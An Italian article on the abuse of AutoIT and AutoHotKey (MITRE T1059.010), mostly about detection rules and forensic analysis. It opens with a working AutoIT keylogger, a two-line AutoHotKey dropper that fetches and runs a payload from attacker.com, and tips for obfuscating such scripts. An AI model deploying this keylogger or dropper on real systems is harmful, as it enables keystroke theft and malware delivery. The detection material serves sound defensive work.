Script di Automazione Malevoli: Command and Scripting Interpreter - AutoHotKey & AutoIT (T1059.010)

Per comprendere l'efficacia di questa tecnica, inizia creando un semplice payload AutoIT che simula un keylogger. Il codice base può essere scritto in pochi minuti:

#include <Misc.au3>
$dll = DllOpen("user32.dll")
$file = FileOpen("log.txt", 1)
While 1
    For $i = 1 To 255
        If _IsPressed(Hex($i, 2), $dll) Then
            FileWrite($file, Chr($i))
        EndIf
    Next
WEnd

Compila lo script in un eseguibile usando Aut2Exe.exe per nascondere il codice sorgente. DarkGate utilizza proprio questa strategia, rilasciando script come test.au3 in directory nascoste durante l'installazione iniziale.

Per AutoHotKey, la sintassi è ancora più immediata. Un dropper base può scaricare ed eseguire payload remoti:

UrlDownloadToFile, http://attacker.com/payload.exe, %TEMP%\update.exe
Run, %TEMP%\update.exe

La potenza di questi linguaggi sta nella loro capacità di interagire con l'intero sistema Windows. XLoader sfrutta AutoIT per decifrare file payload, caricarli in memoria e eseguirli senza toccare il disco.

Per testare le detection, integra tecniche di offuscamento. Usa stringhe base64, split del codice in funzioni multiple, o incorpora gli script in documenti Office come fa APT39. I compilatori nativi producono eseguibili firmati digitalmente che bypassano molti controlli superficiali.

La detection strategy DET0332 evidenzia l'importanza di monitorare non solo l'esecuzione diretta di AutoIt3.exe e AutoHotkey.exe, ma anche i comportamenti anomali dei processi figli. Configura Sysmon per catturare gli EventID 1 (Process Creation) con particolare attenzione ai parametri di linea comando.

I pattern più significativi includono l'esecuzione di script da directory temporanee o user-writable come %TEMP% e %APPDATA%. Lumma Stealer sfrutta proprio queste location per i suoi script AutoIT malevoli.

Implementa regole di correlazione che considerano il ParentProcessName. Script AutoIT lanciati da processi Office, browser o script PowerShell rappresentano anomalie da investigare immediatamente. La detection deve includere il monitoraggio del ChildProcessCount: script di automazione legittimi raramente generano decine di processi figli in rapida successione.

Il TimeWindow è cruciale per ridurre i falsi positivi. Esecuzioni di AutoIT fuori dall'orario lavorativo standard o durante weekend richiedono attenzione particolare. Configura alert graduati: basso rischio per esecuzioni singole durante orario ufficio, critico per esecuzioni multiple notturne con processi figli anomali.

Per OutSteel, sviluppato interamente in AutoIT, la detection richiede analisi comportamentale più che signature-based. Monitora accessi anomali a file di configurazione browser, tentativi di lettura credenziali e comunicazioni di rete verso domini non categorizzati.

L'analisi forense di attacchi basati su AutoIT/AutoHotKey richiede attenzione ai dettagli apparentemente insignificanti. I file script originali .au3 e .ahk vengono spesso eliminati dopo la compilazione, ma tracce persistono nel filesystem.

Esamina le directory temporanee alla ricerca di residui. DarkGate lascia tracce del suo test.au3 anche dopo la cancellazione, recuperabili attraverso tecniche di file carving. Le USN Journal entries registrano la creazione e modifica di questi file anche se successivamente rimossi.

La Prefetch analysis rivela esecuzioni storiche di AutoIt3.exe e AutoHotkey.exe con timestamp precisi e percorsi dei file processati. Correla questi dati con le voci del registro di sistema in HKCU\Software\AutoIt v3 e HKCU\Software\AutoHotkey per ricostruire configurazioni e script eseguiti.

Per malware come Melcoz, distribuito attraverso loader AutoIT, l'analisi deve estendersi ai documenti Office. Estrai e decompila macro VBA che potrebbero aver rilasciato gli script iniziali. I metadati OOXML spesso contengono timestamp di modifica che aiutano a datare l'inizio dell'infezione.

Memory forensics con Volatility può recuperare script AutoIT ancora presenti in memoria anche dopo la loro eliminazione dal disco. Il plugin cmdline mostra i parametri completi di esecuzione, mentre handles rivela file e chiavi di registro acceduti durante l'esecuzione.

APT39 (Chafer) rappresenta l'esempio più documentato di utilizzo sistematico di AutoIT in campagne offensive. Il gruppo iraniano incorpora script AutoIT direttamente in documenti Microsoft Office, sfruttando la fiducia degli utenti nei file apparentemente legittimi.

L'evoluzione nell'uso di questi linguaggi di scripting mostra pattern interessanti. I primi utilizzi erano rozzi keylogger e screen grabber, mentre implementazioni recenti come XLoader dimostrano capacità avanzate di decifratura in memoria e iniezione di codice.

La sovrapposizione tra famiglie malware che utilizzano AutoIT suggerisce possibili collegamenti o condivisione di sviluppatori. DarkGate e Lumma Stealer mostrano tecniche di offuscamento simili nei loro script AutoIT, indicando possibili toolkit comuni nel underground criminale.

L'analisi geografica mostra concentrazioni di attacchi AutoIT-based in regioni con forte presenza di aziende manifatturiere e tecnologiche. Questi settori utilizzano legittimamente automazione desktop, rendendo gli attacchi più difficili da identificare.

Il trend emergente vede la combinazione di AutoIT con tecniche di Living off the Land. Gli attaccanti concatenano script di automazione con tool Windows nativi per creare catene di attacco che bypassano completamente soluzioni antivirus tradizionali.

Framework MITRE ATT&CK T1059.010. Documentazione su campagne APT39 e relative tecniche di attacco. Analisi malware DarkGate, XLoader, Lumma Stealer, OutSteel e Melcoz. Guide implementazione AppLocker e WDAC Microsoft.